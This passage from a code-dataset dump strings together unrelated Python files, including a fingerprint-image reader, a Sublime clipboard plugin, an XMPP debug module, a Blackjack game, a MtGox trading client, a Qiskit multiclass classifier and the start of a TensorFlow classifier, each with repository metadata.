# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PIL import Image
from ...communication import RqPackage
from ...communication import RsDataPacket
from ...communication import RsPackage
from ...communication.rqprimitives import RqByte
from ...instructions.InstructionException import InstructionException
class UpImage:
def __init__(self, rq, rs):
# type: (RqPackage, RsPackage) -> UpImage
self.rq = rq
self.rs = rs
def image(self):
# type: () -> Image
self.rq.send(RqByte(0x0A))
bytes = self.rs.bytes()
confirmation = bytes.content()[0]
if confirmation != 0:
raise InstructionException(
"Can not execute UpImage: {0}".format(confirmation)
)
result = Image.new('L', (256, 288), 'white')
pixels = result.load()
content = RsDataPacket(self.rs).content()
y = 0
for line in content:
x = 0
for c in line:
pixels[x, y] = (c >> 4) * 17
x = x + 1
pixels[x, y] = (c & 0b00001111) * 17
x = x + 1
y += 1
return result
| 2,233 |
Packages/Default/paste_from_history.py
|
ron-wolf/sublime-files
| 62 |
2172390
|
import re
import sublime
import sublime_plugin
class ClipboardHistory():
"""
Stores the current paste history
"""
LIST_LIMIT = 15
def __init__(self):
self.storage = []
def push_text(self, text):
if not text:
return
DISPLAY_LEN = 45
# create a display text out of the text
display_text = re.sub(r'[\n]', '', text)
# trim all starting space/tabs
display_text = re.sub(r'^[\t\s]+', '', display_text)
display_text = (display_text[:DISPLAY_LEN] + '...') if len(display_text) > DISPLAY_LEN else display_text
self.del_duplicate(text)
self.storage.insert(0, (display_text, text))
if len(self.storage) > self.LIST_LIMIT:
del self.storage[self.LIST_LIMIT:]
def get(self):
return self.storage
def del_duplicate(self, text):
# remove all dups
self.storage = [s for s in self.storage if s[1] != text]
def empty(self):
return len(self.storage) == 0
g_clipboard_history = ClipboardHistory()
class ClipboardHistoryUpdater(sublime_plugin.EventListener):
"""
Listens on the sublime text events and push the clipboard content into the
ClipboardHistory object
"""
def on_post_text_command(self, view, name, args):
if view.settings().get('is_widget'):
return
if name == 'copy' or name == 'cut':
g_clipboard_history.push_text(sublime.get_clipboard())
class PasteFromHistoryCommand(sublime_plugin.TextCommand):
def run(self, edit):
if self.view.settings().get('is_widget'):
return
# provide paste choices
paste_list = g_clipboard_history.get()
keys = [x[0] for x in paste_list]
self.view.show_popup_menu(keys, lambda choice_index: self.paste_choice(choice_index))
def is_enabled(self):
return not g_clipboard_history.empty()
def paste_choice(self, choice_index):
if choice_index == -1:
return
# use normal paste command
text = g_clipboard_history.get()[choice_index][1]
# rotate to top
g_clipboard_history.push_text(text)
sublime.set_clipboard(text)
self.view.run_command("paste")
| 2,264 |
library/xmpp/debug.py
|
l29ah/vk4xmpp
| 77 |
2172536
|
## debug.py
##
## Copyright (C) 2003 <NAME>
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published
## by the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
# $Id: debug.py, v1.41 2013/10/21 alkorgun Exp $
_version_ = "1.4.1"
import os
import sys
import time
from traceback import format_exception as traceback_format_exception
colors_enabled = "TERM" in os.environ
color_none = chr(27) + "[0m"
color_black = chr(27) + "[30m"
color_red = chr(27) + "[31m"
color_green = chr(27) + "[32m"
color_brown = chr(27) + "[33m"
color_blue = chr(27) + "[34m"
color_magenta = chr(27) + "[35m"
color_cyan = chr(27) + "[36m"
color_light_gray = chr(27) + "[37m"
color_dark_gray = chr(27) + "[30;1m"
color_bright_red = chr(27) + "[31;1m"
color_bright_green = chr(27) + "[32;1m"
color_yellow = chr(27) + "[33;1m"
color_bright_blue = chr(27) + "[34;1m"
color_purple = chr(27) + "[35;1m"
color_bright_cyan = chr(27) + "[36;1m"
color_white = chr(27) + "[37;1m"
class NoDebug:
def __init__(self, *args, **kwargs):
self.debug_flags = []
def show(self, *args, **kwargs):
pass
def Show(self, *args, **kwargs):
pass
def is_active(self, flag):
pass
colors = {}
def active_set(self, active_flags=None):
return 0
LINE_FEED = "\n"
class Debug:
def __init__(self, active_flags=None, log_file=sys.stderr, prefix="DEBUG: ", sufix="\n", time_stamp=0, flag_show=None, validate_flags=False, welcome=-1):
self.debug_flags = []
if welcome == -1:
if active_flags and len(active_flags):
welcome = 1
else:
welcome = 0
self._remove_dupe_flags()
if log_file:
if isinstance(log_file, str):
try:
self._fh = open(log_file, "w")
except Exception:
print("ERROR: can open %s for writing." % log_file)
sys.exit(0)
else: # assume its a stream type object
self._fh = log_file
else:
self._fh = sys.stdout
if time_stamp not in (0, 1, 2):
raise Exception("Invalid time_stamp param", str(time_stamp))
self.prefix = prefix
self.sufix = sufix
self.time_stamp = time_stamp
self.flag_show = None # must be initialised after possible welcome
self.validate_flags = validate_flags
self.active_set(active_flags)
if welcome:
self.show("")
caller = sys._getframe(1) # used to get name of caller
try:
mod_name = ":%s" % caller.f_locals["__name__"]
except Exception:
mod_name = ""
self.show("Debug created for %s%s" % (caller.f_code.co_filename, mod_name))
self.show(" flags defined: %s" % ",".join(self.active))
if isinstance(flag_show, (str, type(None))):
self.flag_show = flag_show
else:
raise Exception("Invalid type for flag_show!", str(flag_show))
def show(self, msg, flag=None, prefix=None, sufix=None, lf=0):
"""
flag can be of folowing types:
None - this msg will always be shown if any debugging is on
flag - will be shown if flag is active
(flag1,flag2,,,) - will be shown if any of the given flags are active
if prefix / sufix are not given, default ones from init will be used
lf = -1 means strip linefeed if pressent
lf = 1 means add linefeed if not pressent
"""
if self.validate_flags:
self._validate_flag(flag)
if not self.is_active(flag):
return None
if prefix:
pre = prefix
else:
pre = self.prefix
if sufix:
suf = sufix
else:
suf = self.sufix
if self.time_stamp == 2:
output = "%s%s " % (
pre,
time.strftime("%b %d %H:%M:%S",
time.localtime(time.time()))
)
elif self.time_stamp == 1:
output = "%s %s" % (
time.strftime("%b %d %H:%M:%S",
time.localtime(time.time())),
pre
)
else:
output = pre
if self.flag_show:
if flag:
output = "%s%s%s" % (output, flag, self.flag_show)
else:
# this call uses the global default, dont print "None", just show the separator
output = "%s %s" % (output, self.flag_show)
output = "%s%s%s" % (output, msg, suf)
if lf:
# strip/add lf if needed
last_char = output[-1]
if lf == 1 and last_char != LINE_FEED:
output = output + LINE_FEED
elif lf == -1 and last_char == LINE_FEED:
output = output[:-1]
try:
self._fh.write(output)
except Exception:
# unicode strikes again ;)
s = unicode()
for i in xrange(len(output)):
if ord(output[i]) < 128:
c = output[i]
else:
c = "?"
s += c
self._fh.write("%s%s%s" % (pre, s, suf))
self._fh.flush()
def is_active(self, flag):
"""
If given flag(s) should generate output.
"""
# try to abort early to quicken code
if not self.active:
return 0
if not flag or flag in self.active:
return 1
else:
# check for multi flag type:
if isinstance(flag, (list, tuple)):
for s in flag:
if s in self.active:
return 1
return 0
def active_set(self, active_flags=None):
"""
Returns 1 if any flags where actually set, otherwise 0.
"""
r = 0
ok_flags = []
if not active_flags:
# no debuging at all
self.active = []
elif isinstance(active_flags, (tuple, list)):
flags = self._as_one_list(active_flags)
for t in flags:
if t not in self.debug_flags:
sys.stderr.write("Invalid debugflag given: %s\n" % t)
ok_flags.append(t)
self.active = ok_flags
r = 1
else:
# assume comma string
try:
flags = active_flags.split(",")
except Exception:
self.show("***")
self.show("*** Invalid debug param given: %s" % active_flags)
self.show("*** please correct your param!")
self.show("*** due to this, full debuging is enabled")
self.active = self.debug_flags
for f in flags:
s = f.strip()
ok_flags.append(s)
self.active = ok_flags
self._remove_dupe_flags()
return r
def active_get(self):
"""
Returns currently active flags.
"""
return self.active
def _as_one_list(self, items):
"""
Init param might contain nested lists, typically from group flags.
This code organises lst and remves dupes.
"""
if not isinstance(items, (list, tuple)):
return [items]
r = []
for l in items:
if isinstance(l, list):
lst2 = self._as_one_list(l)
for l2 in lst2:
self._append_unique_str(r, l2)
elif l == None:
continue
else:
self._append_unique_str(r, l)
return r
def _append_unique_str(self, lst, item):
"""
Filter out any dupes.
"""
if not isinstance(item, str):
raise Exception("Invalid item type (should be string)", str(item))
if item not in lst:
lst.append(item)
return lst
def _validate_flag(self, flags):
"""
Verify that flag is defined.
"""
if flags:
for flag in self._as_one_list(flags):
if not flag in self.debug_flags:
raise Exception("Invalid debugflag given", str(flag))
def _remove_dupe_flags(self):
"""
If multiple instances of Debug is used in same app,
some flags might be created multiple time, filter out dupes.
"""
unique_flags = []
for f in self.debug_flags:
if f not in unique_flags:
unique_flags.append(f)
self.debug_flags = unique_flags
colors = {}
def Show(self, flag, msg, prefix=""):
msg = msg.replace("\r", "\\r").replace("\n", "\\n").replace("><", ">\n <")
if not colors_enabled:
pass
elif prefix in self.colors:
msg = self.colors[prefix] + msg + color_none
else:
msg = color_none + msg
if not colors_enabled:
prefixcolor = ""
elif flag in self.colors:
prefixcolor = self.colors[flag]
else:
prefixcolor = color_none
if prefix == "error":
e = sys.exc_info()
if e[0]:
msg = msg + "\n" + "".join(traceback_format_exception(e[0], e[1], e[2])).rstrip()
prefix = self.prefix + prefixcolor + (flag + " " * 12)[:12] + " " + (prefix + " " * 6)[:6]
self.show(msg, flag, prefix)
def is_active(self, flag):
if not self.active:
return 0
if not flag or flag in self.active and DBG_ALWAYS not in self.active or flag not in self.active and DBG_ALWAYS in self.active:
return 1
return 0
DBG_ALWAYS = "always"
# Debug=NoDebug # Uncomment this to effectively disable all debugging and all debugging overhead.
| 8,671 |
browser_controller.py
|
crw2998/chartjs-python
| 1 |
2173033
|
import contextlib
from time import sleep
import webbrowser
from pyppeteer import launch
# Simple implementation that is not up to the task of wrangling a whole browser
class SimpleBrowser(object):
def __init__(self):
pass
async def start_browser(self):
pass
async def open_page(self, url):
webbrowser.open(url)
async def set_figure_size(self, width, height):
pass
async def close(self):
return True
class PuppeteerBrowser(object):
def __init__(self, headless=False, use_scale_factor=True):
self._headless = headless
self._use_scale_factor = use_scale_factor
async def start_browser(self):
try:
self.browser = await launch(headless=self._headless, args=["--start-maximized"], setDefaultViewport=False)
self.page = await self.browser.newPage()
height, width, dpr = await self.page.evaluate("[screen.height, screen.width, window.devicePixelRatio]")
await self.page.setViewport({
"width": width-150,
"height": height-275,
"deviceScaleFactor": 2 if self._use_scale_factor else 1
});
except:
await self.try_close()
raise
async def open_page(self, url):
await self.page.goto(url)
async def set_figure_size(self, width, height):
await self.page.setViewport({
"width": width,
"height": height,
"deviceScaleFactor": 2 if self._use_scale_factor else 1
});
async def try_close(self):
with contextlib.suppress(Exception):
await self.browser.close()
async def take_screenshot(self, params):
canvas = await self.page.querySelector('canvas')
await canvas.screenshot(params)
| 1,642 |
concepticon/__init__.py
|
blurks/concepticon
| 3 |
2173217
|
from pyramid.config import Configurator
from clld.interfaces import IDownload
# we must make sure custom models are known at database initialization!
from concepticon import models
from concepticon.views import search_concept
_ = lambda i: i
_('Contributor')
_('Contributors')
_('Contribution')
_('Contributions')
_('Parameter')
_('Parameters')
_('Value')
_('Values')
_('Unit')
_('Units')
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
config = Configurator(settings=settings)
config.include('clldmpg')
cldf = config.registry.queryUtility(IDownload, name='dataset.cldf')
assert config.registry.unregisterUtility(cldf, name='dataset.cldf')
config.add_route('search_concept', '/search_concept')
config.add_route('relations', '/relations')
return config.make_wsgi_app()
| 857 |
tests/conftest.py
|
anuragtr/fabric8-analytics-rudra
| 3 |
2172803
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Add import context."""
from pathlib import Path
import sys
src = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(src))
| 182 |
source/Day11_Blackjack.py
|
jamescodella/100_days_of_code
| 0 |
2172776
|
# Day 11: Blackjack Capstone Project
import random
import os
# List of cards provided in the course.
cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]
# Helper functions
def welcome():
''''
This funciton simply prints some ascii art and a welcome message.
'''
ascii_art = '''
.------. _ _ _ _ _
|A_ _ |. | | | | | | (_) | |
|( \/ ).-----. | |__ | | __ _ ___| | ___ __ _ ___| | __
| \ /|K /\ | | '_ \| |/ _` |/ __| |/ / |/ _` |/ __| |/ /
| \/ | / \ | | |_) | | (_| | (__| <| | (_| | (__| <
`-----| \ / | |_.__/|_|\__,_|\___|_|\_\ |\__,_|\___|_|\_\\
| \/ K| _/ |
`------' |__/
'''
print('\n*** Welcome to Blackjack! ***')
print(ascii_art)
def calculate_score(hand):
'''
This function calculates the sum of values in a given hand.
'''
score = 0
ace_indices = []
for idx, card in enumerate(hand):
score += card
if card == 11:
ace_indices.append(idx)
for idx in ace_indices:
if (score > 21):
score -= 10 # One ace is now treated as a 1.
return score
def draw_card():
'''
This function randomly selects a card from the cards dict
'''
return random.choice(cards)
def compare_scores(players_score, dealers_score):
'''
This function compares dealers score with the players score to see who won the game.
'''
if players_score > 21:
return 'You lose! Your hand went over 21 :('
if dealers_score > 21:
return 'You win! The dealer\'s hand went over 21 :)'
elif dealers_score < players_score:
return 'You win! :)'
elif dealers_score == players_score:
return 'It\'s a draw! :|'
else:
return 'You lose! :('
def game_summary(players_hand, players_score, dealers_hand, dealers_score):
'''
Summarizes final state and score of the game
'''
print('\n\nEND GAME SUMMARY')
print('-------------------------')
print(compare_scores(players_score, dealers_score))
print('Your final hand: ' + str(players_hand) + ', your final score: ' + str(players_score))
print('Dealer\'s final hand: ' + str(dealers_hand) +', dealer\'s final score: ' + str(dealers_score))
print('-------------------------\n')
def play_blackjack():
'''
Main function for game play
'''
# Print ascii art and welcome message
welcome()
# Initialize hands and vars
players_hand = []
dealers_hand = []
players_score = 0
dealers_score = 0
hit_or_stay = 'h'
blackjack = False
# Draw first two cards for each player
players_hand.append(draw_card())
players_hand.append(draw_card())
dealers_hand.append(draw_card())
dealers_hand.append(draw_card())
players_score = calculate_score(players_hand)
dealers_score = calculate_score(dealers_hand)
print('Your hand: ' + str(players_hand) + ', your score: ' + str(players_score))
print('Dealer\'s hand: ['+ str(dealers_hand[0]) +', _], dealer\'s score: ' + str(dealers_score))
if players_score == 21 or dealers_score == 21: # if blackjack occurs for either player, instant win and the game stops
print('\n***Blackjack!***')
hit_or_stay = 's'
blackjack = True
while (hit_or_stay == 'h' or hit_or_stay == 'hit') and blackjack is False:
hit_or_stay = input('Would you like to hit (h) or stay (s)? ').lower()
if hit_or_stay == 's' or hit_or_stay == 'stay':
print(players_hand, players_score)
break
players_hand.append(draw_card())
print('Your hand: ' + str(players_hand) + ', your score: ' + str(players_score))
players_score = calculate_score(players_hand)
if players_score > 21: # Bust
break
if players_score <= 21 and blackjack is False:
while dealers_score < 17:
dealers_hand.append(draw_card())
dealers_score = calculate_score(dealers_hand)
game_summary(players_hand, players_score, dealers_hand, dealers_score)
keep_playing = input('Play again (y) or (n)? ')
if keep_playing == 'y' or keep_playing == 'yes':
os.system('cls' if 'Win' in os.name else 'clear')
play_blackjack()
else:
quit()
if __name__ == '__main__':
play_blackjack()
| 4,528 |
databuilder/extractor/dremio_metadata_extractor.py
|
mroztoczynski/amundsendatabuilder
| 0 |
2171904
|
import sys
import logging
import pyodbc
import importlib
from pyhocon import ConfigFactory, ConfigTree
from typing import Iterator, Union, Dict, Any
from databuilder.extractor.base_extractor import Extractor
LOGGER = logging.getLogger(__name__)
class DremioMetadataExtractor(Extractor):
'''
Requirements:
pyodbc & Dremio driver
'''
DREMIO_USER_KEY = 'user_key'
DREMIO_PASSWORD_KEY = 'password_key'
DREMIO_HOST_KEY = 'host_key'
DREMIO_PORT_KEY = 'port_key'
DREMIO_DRIVER_KEY = 'driver_key'
MODEL_CLASS = 'model_class'
SQL_STATEMENT = 'sql_statement'
DEFAULT_AUTH_USER = 'dremio_auth_user'
DEFAULT_AUTH_PW = '<PASSWORD>'
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = '31010'
DEFAULT_DRIVER = 'DSN=Dremio Connector'
DEFAULT_MODEL_CLASS = None
DEFAULT_SQL_STATEMENT = None
DEFAULT_CONFIG = ConfigFactory.from_dict({
DREMIO_USER_KEY: DEFAULT_AUTH_USER,
DREMIO_PASSWORD_KEY: DEFAULT_AUTH_PW,
DREMIO_HOST_KEY: DEFAULT_HOST,
DREMIO_PORT_KEY: DEFAULT_PORT,
DREMIO_DRIVER_KEY: DEFAULT_DRIVER,
MODEL_CLASS: DEFAULT_MODEL_CLASS,
SQL_STATEMENT: DEFAULT_SQL_STATEMENT
})
def init(self, conf: ConfigTree) -> None:
conf = conf.with_fallback(DremioMetadataExtractor.DEFAULT_CONFIG)
self.__sql_stmt = conf.get_string(DremioMetadataExtractor.SQL_STATEMENT)
self.__model_class = self.__get_model_class(conf.get(DremioMetadataExtractor.MODEL_CLASS, None))
driver = conf.get_string(DremioMetadataExtractor.DREMIO_DRIVER_KEY)
if sys.platform == 'linux':
driver = f'DRIVER={driver}'
self.__dremio_odbc_cursor = pyodbc.connect(
driver,
uid=conf.get_string(DremioMetadataExtractor.DREMIO_USER_KEY),
pwd=conf.get_string(DremioMetadataExtractor.DREMIO_PASSWORD_KEY),
host=conf.get_string(DremioMetadataExtractor.DREMIO_HOST_KEY),
port=conf.get_string(DremioMetadataExtractor.DREMIO_PORT_KEY),
autocommit=True).cursor()
self._extract_iter: Union[None, Iterator] = None
def extract(self) -> Any:
if not self._extract_iter:
self._extract_iter = self.__get_extract_iter()
try:
return next(self._extract_iter)
except StopIteration:
return None
def get_scope(self) -> str:
return 'extractor.dremio'
def __get_model_class(self, model_class_name):
if model_class_name:
module_name, class_name = model_class_name.rsplit(".", 1)
mod = importlib.import_module(module_name)
return getattr(mod, class_name)
def __get_extract_iter(self) -> Any:
LOGGER.info('SQL for Dremio metadata: {}'.format(self.__sql_stmt))
for record in self.__dremio_odbc_cursor.execute(self.__sql_stmt):
result = dict(zip([c[0] for c in self.__dremio_odbc_cursor.description], record))
yield self.__model_class(**result) if self.__model_class else result
| 3,161 |
FirstStepsInPython/Basics/Exams/exam_22_may_2021/05. Excursion Sale.py
|
Pittor052/SoftUni-Studies
| 0 |
2172732
|
trips_sea = int ( input () )
trips_mountain = int ( input () )
command = input ()
sold = False
profit = 0
while not command == "Stop":
if command == "sea":
if not trips_sea == 0:
profit += 680
trips_sea -= 1
else:
trips_sea = 0
elif command == "mountain":
if not trips_mountain == 0:
profit += 499
trips_mountain -= 1
else:
trips_mountain = 0
if (trips_mountain == 0) and (trips_sea == 0):
sold = True
break
command = input()
if sold:
print("Good job! Everything is sold.")
print(f"Profit: {profit} leva.")
else:
print(f"Profit: {profit} leva.")
| 694 |
esi_bot/channels.py
|
lukasni/esi-bot
| 4 |
2173020
|
"""ESI-bot channel helper class."""
import os
import time
from esi_bot.utils import paginated_id_to_names
class Channels:
"""Join and store channel IDs -> names."""
def __init__(self, slack):
"""Create a new Channels caching object."""
self._slack = slack
self._channels = {} # {id: name}
self._last_sync = 0
self._allowed = os.environ.get("BOT_CHANNELS", "esi").split(",")
self._joined = {} # {id: name}
self.primary = None # primary channel ID
self.update_names()
def update_names(self):
"""Update our names cache once per minute at max."""
if time.time() - self._last_sync < 60:
return
self._last_sync = time.time()
channels = paginated_id_to_names(
self._slack,
"channels.list",
"channels",
exclude_archived=1,
)
if channels:
self._channels = channels
def enter_channels(self):
"""Attempt to join the permitted channels.
Returns:
boolean of any channel successfully joined
"""
for ch_id, ch_name in self._channels.items():
if ch_name in self._allowed:
join = self._slack.api_call("channels.join", channel=ch_id)
if join["ok"]:
if self._allowed.index(ch_name) == 0:
self.primary = ch_id
self._joined[ch_id] = ch_name
else:
self._joined.pop(ch_id, None)
return self.primary is not None
def get_name(self, channel_id):
"""Return the channel name if we're in it."""
return self._joined.get(channel_id)
| 1,737 |
rltk/blocking/__init__.py
|
vishalbelsare/rltk
| 98 |
2173245
|
from rltk.blocking.block import Block
from rltk.blocking.block_black_list import BlockBlackList
from rltk.blocking.block_generator import BlockGenerator
from rltk.blocking.hash_block_generator import HashBlockGenerator
from rltk.blocking.token_block_generator import TokenBlockGenerator
from rltk.blocking.canopy_block_generator import CanopyBlockGenerator
from rltk.blocking.sorted_neighbourhood_block_generator import SortedNeighbourhoodBlockGenerator
from rltk.blocking.blocking_helper import BlockingHelper
Blocker = BlockGenerator
HashBlocker = HashBlockGenerator
TokenBlocker = TokenBlockGenerator
CanopyBlocker = CanopyBlockGenerator
SortedNeighbourhoodBlocker = SortedNeighbourhoodBlockGenerator
| 705 |
wordsDict.py
|
brupoon/mustachedNinja
| 0 |
2172818
|
#Chapter 11, Exercise 1
#bpoon
def main():
words = open('words.txt')
wordDict = dict()
for i in words:
word = i.strip()
wordDict[word] = "yes"
def uInput():
uInput = input("word?")
if uInput in wordDict:
print("In dictionary.")
else:
print("Not in dictionary.")
uInput()
if __name__ == '__main__':
main()
| 388 |
src/private_markets/mtgox.py
|
omnibrain/bitcoin-arbitrage
| 1 |
2172926
|
from market import Market
import time
import base64
import hmac
import urllib
import urllib2
import hashlib
import sys
import json
sys.path.append('../')
sys.path.append('.')
import config
import re
from decimal import Decimal
class PrivateMtGox(Market):
ticker_url = { "method": "GET", "url": "https://mtgox.com/api/1/BTCUSD/public/ticker" }
buy_url = { "method": "POST", "url": "https://mtgox.com/api/1/BTCUSD/private/order/add" }
sell_url = { "method": "POST", "url": "https://mtgox.com/api/1/BTCUSD/private/order/add" }
order_url = { "method": "POST", "url": "https://mtgox.com/api/1/generic/private/order/result" }
open_orders_url = { "method": "POST", "url": "https://mtgox.com/api/1/generic/private/orders" }
info_url = { "method": "POST", "url": "https://mtgox.com/api/1/generic/private/info" }
def __init__(self):
super(Market, self).__init__()
self.key = config.mtgox_key
self.secret = config.mtgox_secret
self.currency = "EUR"
self.get_info()
def _create_nonce(self):
return int(time.time() * 1000000)
def _change_currency_url(self, url, currency):
return re.sub(r'BTC\w{3}', r'BTC' + currency, url)
def _to_int_price(self, price, currency):
ret_price = None
if currency in ["USD", "EUR", "GBP", "PLN", "CAD", "AUD", "CHF", "CNY",
"NZD", "RUB", "DKK", "HKD", "SGD", "THB"]:
ret_price = Decimal(price)
ret_price = int(price * 100000)
elif currency in ["JPY", "SEK"]:
ret_price = Decimal(price)
ret_price = int(price * 1000)
return ret_price
def _to_int_amount(self, amount):
amount = Decimal(amount)
return int(amount * 100000000)
def _from_int_amount(self, amount):
return Decimal(amount) / Decimal(100000000.)
def _from_int_price(self, amount):
# FIXME: should take JPY and SEK into account
return Decimal(amount) / Decimal(100000.)
def _send_request(self, url, params, extra_headers=None):
headers = {
'Rest-Key': self.key,
'Rest-Sign': base64.b64encode(str(hmac.new(base64.b64decode(self.secret),
urllib.urlencode(params), hashlib.sha512).digest())),
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
}
if extra_headers is not None:
for k, v in extra_headers.iteritems():
headers[k] = v
req = urllib2.Request(url['url'], urllib.urlencode(params), headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
jsonstr = response.read()
return json.loads(jsonstr)
return None
def trade(self, amount, currency, ttype, price=None):
if price:
price = self._to_int_price(price, currency)
amount = self._to_int_amount(amount)
self.buy_url["url"] = self._change_currency_url(self.buy_url["url"], currency)
params = [ ("nonce", self._create_nonce()),
("amount_int", str(amount)),
("type", ttype) ]
if price:
params.append(("price_int", str(price)))
response = self._send_request(self.buy_url, params)
if response and "result" in response and response["result"] == "success":
return response["return"]
return None
def buy(self, amount, currency, price=None):
return self.trade(amount, currency, "bid", price)
def sell(self, amount, currency, price=None):
return self.trade(amount, currency, "ask", price)
def get_info(self):
params = [ ("nonce", self._create_nonce()) ]
response = self._send_request(self.info_url, params)
if response and "result" in response and response["result"] == "success":
self.btc_balance = self._from_int_amount(int(response["return"]["Wallets"]["BTC"]["Balance"]["value_int"]))
self.eur_balance = self._from_int_price(int(response["return"]["Wallets"]["EUR"]["Balance"]["value_int"]))
return 1
return None
def __str__(self):
return str({ "btc_balance": self.btc_balance, "eur_balance": self.eur_balance })
if __name__ == "__main__":
mtgox = PrivateMtGox()
mtgox.get_info()
#mtgox.buy(0.01, "EUR")
#mtgox.sell(0.01, "EUR")
print mtgox
| 4,574 |
MotorTorpedoQuotePT109/QuotePT109/migrations/0003_auto_20220323_1626.py
|
alex-lake29/MotorTorpedoQuotePT-109
| 0 |
2173280
|
# Generated by Django 2.1.5 on 2022-03-23 16:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('QuotePT109', '0002_page_likes'),
]
operations = [
migrations.CreateModel(
name='QuoteImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.RenameField(
model_name='prompt',
old_name='prompt',
new_name='text',
),
]
| 589 |
Aula 18.py
|
camiloprado/Curso-Python
| 0 |
2173060
|
import pygame
i: int = 0
pygame.init()
pygame.mixer.music.load('t.mp3')
n = input('Digite "s" para começar a musica e "n" para parar: ')
for n in n:
if (n == 's'):
pygame.mixer.music.play()
pygame.event.wait()
print('Aproveite!')
n = input()
elif (n == 'n'):
pygame.mixer.music.stop()
print('Musica parada!')
n = input()
else:
print('Erro!!!')
| 421 |
qiskit_aqua/multiclass/one_against_rest.py
|
NunoEdgarGFlowHub/aqua
| 1 |
2171700
|
# -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from sklearn.preprocessing import LabelBinarizer
from sklearn import datasets
from sklearn.decomposition import PCA
from sklearn import datasets
from sklearn.cross_validation import train_test_split
from qiskit_aqua.multiclass.dimension_reduction import reduce_dim_to
import numpy as np
from sklearn.svm import LinearSVC
from sklearn.utils.validation import _num_samples
class OneAgainstRest: # binary: 1 and 0
def __init__(self, estimator_cls, params=None):
self.estimator_cls = estimator_cls
self.params = params
# def balance(self, X, Y, num_of_classes):
# cond = (Y==1)
# indcond = np.arange(Y.shape[0])[cond]
# X_filtered = X[indcond]
# Y_filtered = Y[indcond]
#
# for i in range(num_of_classes-2):
# Y = np.concatenate((Y,Y_filtered))
# X = np.concatenate((X,X_filtered))
#
# return X, Y
def train(self, X_train, y_train):
self.label_binarizer_ = LabelBinarizer(neg_label=-1)
Y = self.label_binarizer_.fit_transform(y_train)
# Y = Y.tocsc()
self.classes = self.label_binarizer_.classes_
num_of_classes = len(self.classes)
columns = (np.ravel(col) for col in Y.T)
self.estimators = []
for i, column in enumerate(columns):
# print(i, column) #X, column
unique_y = np.unique(column)
if len(unique_y) == 1:
raise Exception("given all data points are assigned to the same class, the prediction would be boring.")
if self.params == None:
estimator = self.estimator_cls()
else:
estimator = self.estimator_cls(*self.params)
# X_train_balanced, column_balanced = self.balance(X_train, column, num_of_classes)
# estimator.fit(X_train_balanced, column_balanced)
estimator.fit(X_train, column)
self.estimators.append(estimator)
def test(self, X, y):
A = self.predict(X)
B = y
l = len(A)
diff = 0
for i in range(0, l):
if A[i] != B[i]:
diff = diff + 1
print("%d out of %d are wrong" %(diff, l))
return 1-(diff*1.0/l)
def predict(self, X):
n_samples = _num_samples(X)
maxima = np.empty(n_samples, dtype=float)
maxima.fill(-np.inf)
argmaxima = np.zeros(n_samples, dtype=int)
for i, e in enumerate(self.estimators):
pred = np.ravel(e.decision_function(X))
np.maximum(maxima, pred, out=maxima)
argmaxima[maxima == pred] = i
return self.classes[np.array(argmaxima.T)]
| 3,350 |
Yukki/Plugins/cleaners.py
|
vaibhav252/YukkiMusic-Old
| 13 |
2172151
|
import os
import shutil
from Yukki import OWNER
from pyrogram.types import Message
from pyrogram import filters, Client
from ..YukkiUtilities.helpers.filters import command
@Client.on_message(command("clean") & filters.user(OWNER))
async def clear_storage(_, message: Message):
dir_1 = 'downloads'
dir_2 = 'search'
shutil.rmtree(dir_1)
shutil.rmtree(dir_2)
os.mkdir(dir_1)
os.mkdir(dir_2)
await message.reply_text("✅ Cleaned all **temp** dir(s) !")
| 491 |
script_tensorflow/classification.py
|
curto2/graphics
| 5 |
2170483
|
# Original python notebook from Fridman <<EMAIL>>.
# Slightly modified by <NAME> Zarza.
# <EMAIL> <EMAIL>
#!/usr/bin/python2
import sys, os, time
import itertools
import math, random
import glob
import tensorflow as tw
import numpy as np
import cv2
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings('ignore')
# Basic parameters
m_epochs = 22
path_class = "gender/" # Adapt for specific class, generate folder with subfolders for each attribute
attributes = ["male","female"] # Add specific attributes
sample_x = 32
sample_y = 32
train_test_split_ratio = 0.9
batch_size = 32
checkpoint_name = "output/c-and-z.ckpt"
# Helper layer functions
def weight_variable(shape):
initial = tw.truncated_normal(shape, stddev=0.1)
return tw.Variable(initial)
def bias_variable(shape):
initial = tw.constant(0.1, shape=shape)
return tw.Variable(initial)
def ctn2d(x, W, stride):
return tw.nn.conv2d(x, W, strides=[1, stride, stride, 1], padding='SAME')
def m_pool_2x2(x):
return tw.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
# Model
x = tw.placeholder(tw.float32, shape=[None, sample_x, sample_y, 3])
y_ = tw.placeholder(tw.float32, shape=[None, len(attributes)])
x_2 = x
# Our first six convolutional layers of 16 3x3 filters
W_ctn1 = weight_variable([3, 3, 3, 16])
b_ctn1 = bias_variable([16])
